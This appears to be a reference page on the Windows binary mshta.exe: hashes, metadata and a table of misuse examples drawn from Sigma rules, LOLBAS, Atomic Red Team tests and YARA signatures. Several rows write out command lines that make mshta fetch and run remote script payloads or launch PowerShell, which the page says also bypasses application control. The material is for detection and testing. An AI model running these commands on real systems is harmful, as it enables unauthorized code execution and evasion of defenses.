mshta.exe

  • File Path: C:\windows\system32\mshta.exe
  • Description: Microsoft (R) HTML Application host

Hashes

| Type | Hash |
|---|---|
| MD5 | A3871DED5ED88F59C0D1396761708F81 |
| SHA1 | CB699E0A77F216A78D0D43867837FFF77B1B4D15 |
| SHA256 | A5E64D89AC3B70AA8D02717C5AB69EC79714E9BD6765D17474ABAFEE3409044C |
| SHA384 | 6337388BEF8A73154B8BAA177FC50EE855CDC64353BB9ECE26E076F1AF38E34CDFC6770E00EBB5E22451604E6A809DC1 |
| SHA512 | C68DF6FFE792458BD37D96A70CD0001D0AB83D77AAAD26C8BC2163500A2B3609C213E015CE056E65E26BFA60C85DFDF41789959C196ACF07DFC9204ED40A6C06 |
| SSDEEP | 192:5WZ8por+TPlBrzUPpGpd4FmxZBbgUPmT7plon7LWwWVIR:O8Q+ZBrwPpO4MvbgT7mWwW |

Signature

  • Status: The file C:\windows\system32\mshta.exe is not digitally signed.
  • Serial:
  • Thumbprint:
  • Issuer:
  • Subject:

File Metadata

  • Original Filename: MSHTA.EXE.MUI
  • Product Name: Internet Explorer
  • Company Name: Microsoft Corporation
  • File Version: 11.00.9600.16384 (winblue_rtm.130821-1623)
  • Product Version: 11.00.9600.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of mshta.exe being misused. While mshta.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

| Source | Source File | Example | License |
|---|---|---|---|
| sigma | godmode_sigma_rule.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | win_invoke_obfuscation_via_use_mshta_services_security.yml | title: Invoke-Obfuscation Via Use MSHTA | DRL 1.0 |
| sigma | win_invoke_obfuscation_via_use_mshta_services_security.yml | description: Detects Obfuscated Powershell via use MSHTA in Scripts | DRL 1.0 |
| sigma | win_invoke_obfuscation_via_use_mshta_services_security.yml | - 'mshta' | DRL 1.0 |
| sigma | win_invoke_obfuscation_via_use_mshta_services.yml | title: Invoke-Obfuscation Via Use MSHTA | DRL 1.0 |
| sigma | win_invoke_obfuscation_via_use_mshta_services.yml | description: Detects Obfuscated Powershell via use MSHTA in Scripts | DRL 1.0 |
| sigma | win_invoke_obfuscation_via_use_mshta_services.yml | - 'mshta' | DRL 1.0 |
| sigma | sysmon_cactustorch.yml | - '\System32\mshta.exe' | DRL 1.0 |
| sigma | sysmon_suspicious_remote_thread.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | file_event_win_susp_clr_logs.yml | - 'mshta' | DRL 1.0 |
| sigma | file_event_win_win_shell_write_susp_directory.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | image_load_suspicious_dbghelp_dbgcore_load.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | image_load_susp_script_dotnet_clr_dll_load.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | posh_pm_invoke_obfuscation_via_use_mhsta.yml | title: Invoke-Obfuscation Via Use MSHTA | DRL 1.0 |
| sigma | posh_pm_invoke_obfuscation_via_use_mhsta.yml | description: Detects Obfuscated Powershell via use MSHTA in Scripts | DRL 1.0 |
| sigma | posh_pm_invoke_obfuscation_via_use_mhsta.yml | Payload\|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' | DRL 1.0 |
| sigma | posh_ps_invoke_obfuscation_via_use_mhsta.yml | title: Invoke-Obfuscation Via Use MSHTA | DRL 1.0 |
| sigma | posh_ps_invoke_obfuscation_via_use_mhsta.yml | description: Detects Obfuscated Powershell via use MSHTA in Scripts | DRL 1.0 |
| sigma | posh_ps_invoke_obfuscation_via_use_mhsta.yml | ScriptBlockText\|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' | DRL 1.0 |
| sigma | proc_creation_win_apt_babyshark.yml | - powershell.exe mshta.exe http* | DRL 1.0 |
| sigma | proc_creation_win_apt_lazarus_activity_apr21.yml | - 'mshta' | DRL 1.0 |
| sigma | proc_creation_win_apt_lazarus_activity_apr21.yml | - 'C:\Windows\System32\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_apt_ta505_dropper.yml | description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents | DRL 1.0 |
| sigma | proc_creation_win_apt_ta505_dropper.yml | Image\|endswith: '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_exploit_cve_2017_11882.yml | description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe | DRL 1.0 |
| sigma | proc_creation_win_invoke_obfuscation_via_use_mhsta.yml | title: Invoke-Obfuscation Via Use MSHTA | DRL 1.0 |
| sigma | proc_creation_win_invoke_obfuscation_via_use_mhsta.yml | description: Detects Obfuscated Powershell via use MSHTA in Scripts | DRL 1.0 |
| sigma | proc_creation_win_invoke_obfuscation_via_use_mhsta.yml | CommandLine\|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' | DRL 1.0 |
| sigma | proc_creation_win_lethalhta.yml | title: MSHTA Spwaned by SVCHOST | DRL 1.0 |
| sigma | proc_creation_win_lethalhta.yml | description: Detects MSHTA.EXE spwaned by SVCHOST as seen in LethalHTA and described in report | DRL 1.0 |
| sigma | proc_creation_win_lethalhta.yml | Image\|endswith: '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_lolbins_by_office_applications.yml | - 'mshta' | DRL 1.0 |
| sigma | proc_creation_win_lolbins_with_wmiprvse_parent_process.yml | - 'mshta' | DRL 1.0 |
| sigma | proc_creation_win_mshta_javascript.yml | title: Mshta JavaScript Execution | DRL 1.0 |
| sigma | proc_creation_win_mshta_javascript.yml | description: Identifies suspicious mshta.exe commands. | DRL 1.0 |
| sigma | proc_creation_win_mshta_javascript.yml | Image\|endswith: '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_mshta_spawn_shell.yml | title: MSHTA Spawning Windows Shell | DRL 1.0 |
| sigma | proc_creation_win_mshta_spawn_shell.yml | description: Detects a Windows command line executable started from MSHTA | DRL 1.0 |
| sigma | proc_creation_win_mshta_spawn_shell.yml | ParentImage\|endswith: '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml | - 'mshta' | DRL 1.0 |
| sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml | `- '*mshta*'` | DRL 1.0 |
| sigma | proc_creation_win_office_shell.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_outlook_shell.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_possible_applocker_bypass.yml | #- '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_public_folder_parent.yml | - 'mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_renamed_binary.yml | - 'mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_renamed_binary.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_renamed_binary_highly_relevant.yml | - 'mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_renamed_binary_highly_relevant.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_script_event_consumer_spawn.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_shell_spawn_mshta.yml | title: Mshta Spawning Windows Shell | DRL 1.0 |
| sigma | proc_creation_win_shell_spawn_mshta.yml | description: Detects a suspicious child process of a mshta.exe process | DRL 1.0 |
| sigma | proc_creation_win_shell_spawn_mshta.yml | ParentImage\|endswith: '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_shell_spawn_susp_program.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_covenant.yml | - 'mshta file.hta' | DRL 1.0 |
| sigma | proc_creation_win_susp_csc.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_mshta_execution.yml | title: MSHTA Suspicious Execution 01 | DRL 1.0 |
| sigma | proc_creation_win_susp_mshta_execution.yml | description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism | DRL 1.0 |
| sigma | proc_creation_win_susp_mshta_execution.yml | Image\|endswith: '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_mshta_pattern.yml | title: Suspicious MSHTA Process Patterns | DRL 1.0 |
| sigma | proc_creation_win_susp_mshta_pattern.yml | description: Detects suspicious mshta process patterns | DRL 1.0 |
| sigma | proc_creation_win_susp_mshta_pattern.yml | - https://www.echotrail.io/insights/search/mshta.exe | DRL 1.0 |
| sigma | proc_creation_win_susp_mshta_pattern.yml | Image\|endswith: '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_mshta_pattern.yml | - 'mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_mshta_pattern.yml | - 'mshta' | DRL 1.0 |
| sigma | proc_creation_win_susp_powershell_parent_process.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_regsvr32_anomalies.yml | ParentImage\|endswith: '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_script_exec_from_env_folder.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_script_exec_from_env_folder.yml | - 'mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_script_exec_from_temp.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_servu_process_pattern.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_shell_spawn_by_java.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_shell_spawn_by_java_keytool.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_system_user_anomaly.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_task_folder_evasion.yml | description: The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr | DRL 1.0 |
| sigma | driver_load_invoke_obfuscation_via_use_mshta_services.yml | title: Invoke-Obfuscation Via Use MSHTA | DRL 1.0 |
| sigma | driver_load_invoke_obfuscation_via_use_mshta_services.yml | description: Detects Obfuscated Powershell via use MSHTA in Scripts | DRL 1.0 |
| sigma | driver_load_invoke_obfuscation_via_use_mshta_services.yml | ImagePath\|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' | DRL 1.0 |
| LOLBAS | Mshta.yml | Name: Mshta.exe | |
| LOLBAS | Mshta.yml | - Command: mshta.exe evilfile.hta | |
| LOLBAS | Mshta.yml | - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) | |
| LOLBAS | Mshta.yml | - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close(); | |
| LOLBAS | Mshta.yml | - Command: mshta.exe "C:\ads\file.txt:file.hta" | |
| LOLBAS | Mshta.yml | - Path: C:\Windows\System32\mshta.exe | |
| LOLBAS | Mshta.yml | - Path: C:\Windows\SysWOW64\mshta.exe | |
| LOLBAS | Mshta.yml | - IOC: mshta.exe executing raw or obfuscated script within the command-line | |
| LOLBAS | Mshta.yml | - IOC: DotNet CLR libraries loaded into mshta.exe | |
| LOLBAS | Mshta.yml | - IOC: DotNet CLR Usage Log - mshta.exe.log | |
| LOLBAS | Mshta.yml | - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct | |
| LOLBAS | Mshtml.yml | Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box). | |
| LOLBAS | Url.yml | Usecase: Invoke an HTML Application via mshta.exe (Default Handler). | |
| atomic-red-team | index.md | - T1218.005 Mshta | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #10: Mshta used to Execute PowerShell [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #9: Powershell invoke mshta.exe download [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - T1218.005 Mshta | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #10: Mshta used to Execute PowerShell [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #9: Powershell invoke mshta.exe download [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | matrix.md | \| \| \| SSH Authorized Keys \| Systemd Timers \| Mshta \| \| \| \| \| \| \| \| | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-matrix.md | \| \| \| Screensaver \| Time Providers CONTRIBUTE A TEST \| Mshta \| \| \| \| \| \| \| \| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.001.md | - Atomic Test #9 - Powershell invoke mshta.exe download | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.001.md | ## Atomic Test #9 - Powershell invoke mshta.exe download | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.001.md | Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!". | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.001.md | \| url \| url of payload to execute \| Url \| https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.001.md | C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()" | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.005.md | `Get-WmiObject win32_process \| Where-Object {$_.CommandLine -like "*mshta*"} \| % { "$(Stop-Process $_.ProcessID)" } \| Out-Null` | MIT License. © 2018 Red Canary |
| atomic-red-team | T1204.002.md | Stop-Process -name mshta | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | # T1218.005 - Mshta | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | - Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | - Atomic Test #2 - Mshta executes VBScript to execute malicious command | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | - Atomic Test #3 - Mshta Executes Remote HTML Application (HTA) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | - Atomic Test #10 - Mshta used to Execute PowerShell | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | ## Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | \| file_url \| location of the payload \| Url \| https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close(); | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | ## Atomic Test #2 - Mshta executes VBScript to execute malicious command | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file PathToAtomicsFolder\T1218.005\src\powershell.ps1"":close") | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | ## Atomic Test #3 - Mshta Executes Remote HTML Application (HTA) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | mshta "#{temp_file}" | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | \| mshta_file_path \| Location of mshta.exe \| String \| $env:windir\system32\mshta.exe\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | \| mshta_file_path \| Location of mshta.exe \| Path \| $env:windir\system32\mshta.exe\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | ## Atomic Test #10 - Mshta used to Execute PowerShell | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | mshta.exe "about:'" | MIT License. © 2018 Red Canary |
| signature-base | apt_babyshark.yar | $x2 = /mshta.exe http:\/\/[a-z0-9.\/]{5,30}.hta/ | CC BY-NC 4.0 |
| signature-base | apt_fin7.yar | $x7 = "7374656d33325c6d736874612e657865000023002e002e005c002e002e005c002e002e005c00570069006e0064006f00770073005c005300790073007400" ascii /* hex encoded string 'stem32\mshta.exe#......\Windows\Syst' */ | CC BY-NC 4.0 |
| signature-base | apt_leviathan.yar | $x2 = ".Run \"taskkill /im mshta.exe" ascii | CC BY-NC 4.0 |
| signature-base | exploit_cve_2017_11882.yar | $x1 = "4d534854412e4558452068747470" /* MSHTA.EXE http */ | CC BY-NC 4.0 |
| signature-base | exploit_cve_2017_11882.yar | $x2 = "6d736874612e6578652068747470" /* mshta.exe http */ | CC BY-NC 4.0 |
| signature-base | exploit_cve_2017_11882.yar | $x3 = "6d736874612068747470" /* mshta http */ | CC BY-NC 4.0 |
| signature-base | exploit_cve_2017_11882.yar | $x4 = "4d534854412068747470" /* MSHTA http */ | CC BY-NC 4.0 |
| signature-base | exploit_cve_2017_11882.yar | $mshta = "mshta" | CC BY-NC 4.0 |
| signature-base | exploit_cve_2017_11882.yar | any of ($mshta, $http, $https, $cmd, $pwsh, $exe) and any of ($equation1, $equation2) and $address | CC BY-NC 4.0 |
| signature-base | exploit_cve_2017_8759.yar | $s2 = /<soap:address location="http[s]?:\/\/[^"]{8,140}mshta.exe"/ ascii wide | CC BY-NC 4.0 |
| signature-base | gen_mal_scripts.yar | description = "Detects MSHTA Bypass" | CC BY-NC 4.0 |
| signature-base | gen_mal_scripts.yar | $s3 = "/c start mshta j" ascii nocase | CC BY-NC 4.0 |
| signature-base | gen_url_persitence.yar | $file1 = /\x0a\x0d\s=[^\x0d](powershell\|cmd\|certutil\|mshta\|wscript\|cscript\|rundll32\|wmic\|regsvr32\|msbuild)(.exe\|)[^\x0d]{2,50}\x0d/ nocase | CC BY-NC 4.0 |

MIT License. Copyright (c) 2020-2021 Strontic.